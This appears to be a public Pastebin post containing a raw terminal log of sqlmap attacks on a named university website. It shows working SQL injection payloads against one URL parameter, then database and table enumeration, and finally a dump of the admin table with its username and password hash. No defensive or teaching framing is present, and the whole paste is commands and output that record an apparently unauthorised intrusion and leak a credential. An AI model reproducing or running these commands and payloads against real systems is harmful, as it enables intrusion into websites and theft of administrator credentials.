API tools faq
paste
Advertisement
arieonline

unimus.ac.id sqlmap

arieonline
Aug 31st, 2012
210
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 14.63 KB | None | 0 0
raw download clone embed print report
  1. root@P3eL-03:~/temp/sqlmap# ./sqlmap.py --proxy=http://172.17.0.18:8080/ -u "http://unimus.ac.id/konten.php?no_tab=4&&id=34&&lang=11" -p id --random-agent
  2.  
  3. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  4. http://sqlmap.org
  5.  
  6. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  7.  
  8. [*] starting at 06:11:40
  9.  
  10. [06:11:40] [INFO] fetched random HTTP User-Agent header from file '/root/temp/sqlmap/txt/user-agents.txt': Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.196.2 Safari/532.0
  11. [06:11:40] [INFO] testing connection to the target url
  12. [06:11:40] [INFO] heuristics detected web page charset 'ISO-8859-2'
  13. [06:11:40] [INFO] testing if the url is stable, wait a few seconds
  14. [06:11:42] [INFO] url is stable
  15. [06:11:42] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable
  16. [06:11:42] [INFO] testing for SQL injection on GET parameter 'id'
  17. [06:11:42] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  18. [06:11:47] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
  19. [06:11:47] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
  20. [06:11:47] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
  21. [06:11:47] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
  22. [06:11:47] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
  23. [06:11:48] [INFO] testing 'MySQL > 5.0.11 stacked queries'
  24. [06:11:48] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
  25. [06:11:48] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
  26. [06:11:48] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
  27. [06:11:59] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
  28. [06:11:59] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
  29. [06:11:59] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
  30. [06:12:00] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
  31. [06:12:01] [INFO] target url appears to have 4 columns in query
  32. [06:12:03] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
  33. GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
  34. sqlmap identified the following injection points with a total of 32 HTTP(s) requests:
  35. ---
  36. Place: GET
  37. Parameter: id
  38. Type: boolean-based blind
  39. Title: AND boolean-based blind - WHERE or HAVING clause
  40. Payload: no_tab=4&&id=34' AND 7045=7045 AND 'ymrS'='ymrS&&lang=11
  41.  
  42. Type: UNION query
  43. Title: MySQL UNION query (NULL) - 4 columns
  44. Payload: no_tab=4&&id=-7558' UNION ALL SELECT NULL,CONCAT(0x3a6c70743a,0x567674556942766f7764,0x3a656e7a3a),NULL,NULL#&&lang=11
  45.  
  46. Type: AND/OR time-based blind
  47. Title: MySQL > 5.0.11 AND time-based blind
  48. Payload: no_tab=4&&id=34' AND SLEEP(5) AND 'zUvp'='zUvp&&lang=11
  49. ---
  50. [06:12:08] [INFO] the back-end DBMS is MySQL
  51. web server operating system: Linux Fedora 17 (Beefy)
  52. web application technology: Apache 2.2.22, PHP 5.3.10
  53. back-end DBMS: MySQL 5.0.11
  54. [06:12:08] [INFO] fetched data logged to text files under '/root/temp/sqlmap/output/unimus.ac.id'
  55.  
  56. [*] shutting down at 06:12:08
  57. ============================================================================================
  58. root@P3eL-03:~/temp/sqlmap# ./sqlmap.py --proxy=http://172.17.0.18:8080/ -u "http://unimus.ac.id/konten.php?no_tab=4&&id=34&&lang=11" -p id --random-agent --threads 10 --banner
  59.  
  60. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  61. http://sqlmap.org
  62.  
  63. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  64.  
  65. [*] starting at 06:13:50
  66.  
  67. [06:13:50] [INFO] fetched random HTTP User-Agent header from file '/root/temp/sqlmap/txt/user-agents.txt': Mozilla/6.0 (Windows; U; Windows NT 7.0; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.9 (.NET CLR 3.5.30729)
  68. [06:13:51] [INFO] resuming back-end DBMS 'mysql'
  69. [06:13:51] [INFO] testing connection to the target url
  70. [06:13:51] [INFO] heuristics detected web page charset 'ISO-8859-2'
  71. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  72. ---
  73. Place: GET
  74. Parameter: id
  75. Type: boolean-based blind
  76. Title: AND boolean-based blind - WHERE or HAVING clause
  77. Payload: no_tab=4&&id=34' AND 7045=7045 AND 'ymrS'='ymrS&&lang=11
  78.  
  79. Type: UNION query
  80. Title: MySQL UNION query (NULL) - 4 columns
  81. Payload: no_tab=4&&id=-7558' UNION ALL SELECT NULL,CONCAT(0x3a6c70743a,0x567674556942766f7764,0x3a656e7a3a),NULL,NULL#&&lang=11
  82.  
  83. Type: AND/OR time-based blind
  84. Title: MySQL > 5.0.11 AND time-based blind
  85. Payload: no_tab=4&&id=34' AND SLEEP(5) AND 'zUvp'='zUvp&&lang=11
  86. ---
  87. [06:13:51] [INFO] the back-end DBMS is MySQL
  88. [06:13:51] [INFO] fetching banner
  89. web server operating system: Linux Fedora 17 (Beefy)
  90. web application technology: Apache 2.2.22, PHP 5.3.10
  91. back-end DBMS: MySQL 5.0.11
  92. banner: '5.5.20'
  93. [06:13:53] [INFO] fetched data logged to text files under '/root/temp/sqlmap/output/unimus.ac.id'
  94.  
  95. [*] shutting down at 06:13:53
  96. ============================================================================================
  97. root@P3eL-03:~/temp/sqlmap# ./sqlmap.py --proxy=http://172.17.0.18:8080/ -u "http://unimus.ac.id/konten.php?no_tab=4&&id=34&&lang=11" -p id --random-agent --threads 10 --dbs
  98.  
  99. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  100. http://sqlmap.org
  101.  
  102. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  103.  
  104. [*] starting at 06:14:43
  105.  
  106. [06:14:43] [INFO] fetched random HTTP User-Agent header from file '/root/temp/sqlmap/txt/user-agents.txt': Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060308 Linux Mint/7 (Gloria) Firefox/3.0.11
  107. [06:14:43] [INFO] resuming back-end DBMS 'mysql'
  108. [06:14:43] [INFO] testing connection to the target url
  109. [06:14:44] [INFO] heuristics detected web page charset 'ISO-8859-2'
  110. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  111. ---
  112. Place: GET
  113. Parameter: id
  114. Type: boolean-based blind
  115. Title: AND boolean-based blind - WHERE or HAVING clause
  116. Payload: no_tab=4&&id=34' AND 7045=7045 AND 'ymrS'='ymrS&&lang=11
  117.  
  118. Type: UNION query
  119. Title: MySQL UNION query (NULL) - 4 columns
  120. Payload: no_tab=4&&id=-7558' UNION ALL SELECT NULL,CONCAT(0x3a6c70743a,0x567674556942766f7764,0x3a656e7a3a),NULL,NULL#&&lang=11
  121.  
  122. Type: AND/OR time-based blind
  123. Title: MySQL > 5.0.11 AND time-based blind
  124. Payload: no_tab=4&&id=34' AND SLEEP(5) AND 'zUvp'='zUvp&&lang=11
  125. ---
  126. [06:14:44] [INFO] the back-end DBMS is MySQL
  127. web server operating system: Linux Fedora 17 (Beefy)
  128. web application technology: Apache 2.2.22, PHP 5.3.10
  129. back-end DBMS: MySQL 5.0.11
  130. [06:14:44] [INFO] fetching database names
  131. [06:14:44] [INFO] the SQL query used returns 2 entries
  132. [06:14:44] [INFO] starting 2 threads
  133. [06:14:45] [INFO] retrieved: "unimux"
  134. [06:14:45] [INFO] retrieved: "information_schema"
  135. available databases [2]:
  136. [*] information_schema
  137. [*] unimux
  138.  
  139. [06:14:45] [INFO] fetched data logged to text files under '/root/temp/sqlmap/output/unimus.ac.id'
  140.  
  141. [*] shutting down at 06:14:45
  142. ============================================================================================
  143. root@P3eL-03:~/temp/sqlmap# ./sqlmap.py --proxy=http://172.17.0.18:8080/ -u "http://unimus.ac.id/konten.php?no_tab=4&&id=34&&lang=11" -p id --random-agent --threads 10 -D unimux --tables
  144.  
  145. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  146. http://sqlmap.org
  147.  
  148. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  149.  
  150. [*] starting at 06:16:14
  151.  
  152. [06:16:15] [INFO] fetched random HTTP User-Agent header from file '/root/temp/sqlmap/txt/user-agents.txt': Mozilla/4.0 (Windows; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
  153. [06:16:15] [INFO] resuming back-end DBMS 'mysql'
  154. [06:16:15] [INFO] testing connection to the target url
  155. [06:16:15] [INFO] heuristics detected web page charset 'ISO-8859-2'
  156. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  157. ---
  158. Place: GET
  159. Parameter: id
  160. Type: boolean-based blind
  161. Title: AND boolean-based blind - WHERE or HAVING clause
  162. Payload: no_tab=4&&id=34' AND 7045=7045 AND 'ymrS'='ymrS&&lang=11
  163.  
  164. Type: UNION query
  165. Title: MySQL UNION query (NULL) - 4 columns
  166. Payload: no_tab=4&&id=-7558' UNION ALL SELECT NULL,CONCAT(0x3a6c70743a,0x567674556942766f7764,0x3a656e7a3a),NULL,NULL#&&lang=11
  167.  
  168. Type: AND/OR time-based blind
  169. Title: MySQL > 5.0.11 AND time-based blind
  170. Payload: no_tab=4&&id=34' AND SLEEP(5) AND 'zUvp'='zUvp&&lang=11
  171. ---
  172. [06:16:15] [INFO] the back-end DBMS is MySQL
  173. web server operating system: Linux Fedora 17 (Beefy)
  174. web application technology: Apache 2.2.22, PHP 5.3.10
  175. back-end DBMS: MySQL 5.0.11
  176. [06:16:15] [INFO] fetching tables for database: 'unimux'
  177. [06:16:16] [INFO] the SQL query used returns 14 entries
  178. [06:16:16] [INFO] starting 10 threads
  179. [06:16:18] [INFO] retrieved: "berita_ar"
  180. [06:16:18] [INFO] retrieved: "berita"
  181. [06:16:18] [INFO] retrieved: "info_ing"
  182. [06:16:18] [INFO] retrieved: "info"
  183. [06:16:18] [INFO] retrieved: "info_ar"
  184. [06:16:18] [INFO] retrieved: "konten"
  185. [06:16:18] [INFO] retrieved: "menu"
  186. [06:16:18] [INFO] retrieved: "other"
  187. [06:16:18] [INFO] retrieved: "admin"
  188. [06:16:18] [INFO] retrieved: "berita_ing"
  189. [06:16:19] [INFO] retrieved: "pengumuman"
  190. [06:16:19] [INFO] retrieved: "slide"
  191. [06:16:19] [INFO] retrieved: "tab"
  192. [06:16:19] [INFO] retrieved: "univ"
  193. Database: unimux
  194. [14 tables]
  195. +------------+
  196. | admin |
  197. | berita |
  198. | berita_ar |
  199. | berita_ing |
  200. | info |
  201. | info_ar |
  202. | info_ing |
  203. | konten |
  204. | menu |
  205. | other |
  206. | pengumuman |
  207. | slide |
  208. | tab |
  209. | univ |
  210. +------------+
  211.  
  212. [06:16:19] [INFO] fetched data logged to text files under '/root/temp/sqlmap/output/unimus.ac.id'
  213.  
  214. [*] shutting down at 06:16:19
  215. ============================================================================================
  216. root@P3eL-03:~/temp/sqlmap# ./sqlmap.py --proxy=http://172.17.0.18:8080/ -u "http://unimus.ac.id/konten.php?no_tab=4&&id=34&&lang=11" -p id --random-agent --threads 10 -D unimux -T admin --dump
  217.  
  218. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  219. http://sqlmap.org
  220.  
  221. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  222.  
  223. [*] starting at 06:17:22
  224.  
  225. [06:17:22] [INFO] fetched random HTTP User-Agent header from file '/root/temp/sqlmap/txt/user-agents.txt': Mozilla/5.0 (X11; U; Linux x86; rv:1.9.1.1) Gecko/20090716 Linux Firefox/3.5.1
  226. [06:17:23] [INFO] resuming back-end DBMS 'mysql'
  227. [06:17:23] [INFO] testing connection to the target url
  228. [06:17:23] [INFO] heuristics detected web page charset 'ISO-8859-2'
  229. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  230. ---
  231. Place: GET
  232. Parameter: id
  233. Type: boolean-based blind
  234. Title: AND boolean-based blind - WHERE or HAVING clause
  235. Payload: no_tab=4&&id=34' AND 7045=7045 AND 'ymrS'='ymrS&&lang=11
  236.  
  237. Type: UNION query
  238. Title: MySQL UNION query (NULL) - 4 columns
  239. Payload: no_tab=4&&id=-7558' UNION ALL SELECT NULL,CONCAT(0x3a6c70743a,0x567674556942766f7764,0x3a656e7a3a),NULL,NULL#&&lang=11
  240.  
  241. Type: AND/OR time-based blind
  242. Title: MySQL > 5.0.11 AND time-based blind
  243. Payload: no_tab=4&&id=34' AND SLEEP(5) AND 'zUvp'='zUvp&&lang=11
  244. ---
  245. [06:17:23] [INFO] the back-end DBMS is MySQL
  246. web server operating system: Linux Fedora 17 (Beefy)
  247. web application technology: Apache 2.2.22, PHP 5.3.10
  248. back-end DBMS: MySQL 5.0.11
  249. [06:17:23] [INFO] fetching columns for table 'admin' in database 'unimux'
  250. [06:17:23] [INFO] the SQL query used returns 3 entries
  251. [06:17:23] [INFO] starting 3 threads
  252. [06:17:24] [INFO] retrieved: "user","varchar(10)"
  253. [06:17:24] [INFO] retrieved: "pass","varchar(50)"
  254. [06:17:24] [INFO] retrieved: "ket","varchar(3)"
  255. [06:17:24] [INFO] fetching entries for table 'admin' in database 'unimux'
  256. [06:17:25] [INFO] the SQL query used returns 1 entries
  257. [06:17:25] [INFO] retrieved: "on","7cea491e8e55064a65f24cc1b4b69384","admin"
  258. [06:17:25] [INFO] analyzing table dump for possible password hashes
  259. recognized possible password hashes in column 'pass'. Do you want to crack them via a dictionary-based attack? [Y/n/q] n
  260. Database: unimux
  261. Table: admin
  262. [1 entry]
  263. +-----+-------+----------------------------------+
  264. | ket | user | pass |
  265. +-----+-------+----------------------------------+
  266. | on | admin | 7cea491e8e55064a65f24cc1b4b69384 |
  267. +-----+-------+----------------------------------+
  268.  
  269. [06:17:29] [INFO] table 'unimux.admin' dumped to CSV file '/root/temp/sqlmap/output/unimus.ac.id/dump/unimux/admin.csv'
  270. [06:17:29] [INFO] fetched data logged to text files under '/root/temp/sqlmap/output/unimus.ac.id'
  271.  
  272. [*] shutting down at 06:17:29
  273. ============================================================================================
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!